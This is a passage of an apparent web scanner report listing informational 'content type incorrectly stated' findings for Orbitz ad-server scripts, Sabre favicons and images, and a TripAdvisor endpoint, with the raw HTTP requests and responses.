P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var adRotator = new adRotator();

28.100. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script&

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317601998697&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:25 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var adRotator = new adRotator();

28.101. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script&

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602110931&height=225&rotator=true&width=519&adType=script& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6; NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:12 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 32
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 32

var adRotator = new adRotator();

28.102. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1302538563-3; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv002p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1048
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1048
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Top hotel deals of the week';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=PRO'
var target = '_parent';
// target is '_top' for internal links,
...[SNIP]...

28.103. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:25 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1086
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1086
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Top hotel deals of the week';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=PRO'
var target = '_parent';
// target is '_top' for internal links,
...[SNIP]...

28.104. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba921-13167-437180534-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
ntCoent-Length: 1068
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1068
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 35% at eco-friendly hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=eco-vacations&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' f
...[SNIP]...

28.105. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:26 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1106
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1106
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 35% at eco-friendly hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=eco-vacations&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' f
...[SNIP]...

28.106. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:49 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeba823-19234-1962717445-8; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv004p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1086
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1086
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Enjoy fall savings of up to 40% off hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top'
...[SNIP]...

28.107. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:26 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1124
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1124
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Enjoy fall savings of up to 40% off hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top'
...[SNIP]...

28.108. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:48 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: NGUserID=aeb2422-10897-1123568220-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: egadserv003p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1077
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1077
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 30% at Chicago hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=chicagovacation&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' for
...[SNIP]...

28.109. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.revresda.com
Path:   /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A& HTTP/1.1
Host: www.revresda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=aeb2623-25195-1628532852-6

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:33:25 GMT
Server: Apache/2.2.3 (CentOS)
AdServer: egadserv001p.prod.orbitz.net:9678:1
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Cteonnt-Length: 1115
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 1115
Set-Cookie: NSC_xxx.sfwsfteb.dpn.80_gxe=ffffffff09e388be45525d5f4f58455e445a4a423660;path=/;httponly

var copy = 'Save up to 30% at Chicago hotels';
var url = 'http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=chicagovacation&cnt=PRO&type=qs_dl'
var target = '_parent';
// target is '_top' for
...[SNIP]...

28.110. http://www.sabrehospitality.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabrehospitality.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content. The body begins with the ICO file header (bytes 00 00 01 00, rendered as dots below), so this is a Windows icon served as text/plain; the correct type is image/x-icon.

Request

GET /favicon.ico HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35; __utma=1.152168344.1317600463.1317600463.1317600463.1; __utmb=1.1.10.1317600463; __utmc=1; __utmz=1.1317600463.1.1.utmcsr=sabre.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:50 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 16 Mar 2010 21:58:47 GMT
ETag: "27ce54-37e-1a1cb3c0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ........................................................................................99......................nn.......................................................
...[SNIP]...

28.111. http://www.sabrehospitality.com/images/masthead/int-masthead-distribution.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabrehospitality.com
Path:   /images/masthead/int-masthead-distribution.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image. The body begins with the PNG signature and an IHDR chunk, so the file is a PNG with a .jpg name served as image/jpeg. Browsers sniff image types, so it still renders, but the declared type is wrong.

Request

GET /images/masthead/int-masthead-distribution.jpg HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/hotel-distribution-systems.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7578a4s2f2v2eeuc05nnpk0f35; __utma=1.152168344.1317600463.1317600463.1317600463.1; __utmb=1.1.10.1317600463; __utmc=1; __utmz=1.1317600463.1.1.utmcsr=sabre.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:09 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 31 Mar 2010 19:23:09 GMT
ETag: "27ce9a-104689-ad24c140"
Accept-Ranges: bytes
Content-Length: 1066633
Connection: close
Content-Type: image/jpeg
X-Pad: avoid browser bug

.PNG
.
...IHDR...............$n....tEXtSoftware.Adobe ImageReadyq.e<..F+IDATx.....%9.$........O#g......p.
(.9`.3.p.....H..TgF....SUM..._.-}...7......%.um|.A..).h$.~;...{...........+g...#............
...[SNIP]...

28.112. http://www.sabretravelnetwork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content. As in 28.110, the body begins with the ICO file header (bytes 00 00 01 00), so this is a Windows icon served as text/plain; the correct type is image/x-icon.

Request

GET /favicon.ico HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; exp_last_activity=1317618416; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 30 Apr 2009 18:23:44 GMT
ETag: "ec8bfd-57e-cbd08c00"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

28.113. http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tnetnoc.com
Path:   /siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image. The body begins with the JPEG/JFIF signature, so the file is a JPEG with a .png name served as image/png.

Request

GET /siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png HTTP/1.1
Host: www.tnetnoc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 01 Sep 2011 20:26:52 GMT
ETag: "e78-4abe710b1eaa1"
Accept-Ranges: bytes
Content-Length: 3704
Content-Type: image/png
Date: Mon, 03 Oct 2011 00:27:18 GMT
Connection: close

......JFIF.............C...............
.

       
...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((......<...."..............................
...[SNIP]...

28.114. http://www.tripadvisor.com/HotelCheckRates

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /HotelCheckRates

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text. The body is an HTML comment (<!--check rates-->), which is valid HTML, so the declared type is correct; this classification is an artefact of the scanner's heuristic rather than a real mismatch.

Request

POST /HotelCheckRates?Action=AddBoomerangTag HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.tripadvisor.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

checkIn=10%2F14%2F2011&checkOut=10%2F16%2F2011&adults=2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:05 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:05 GMT; Path=/
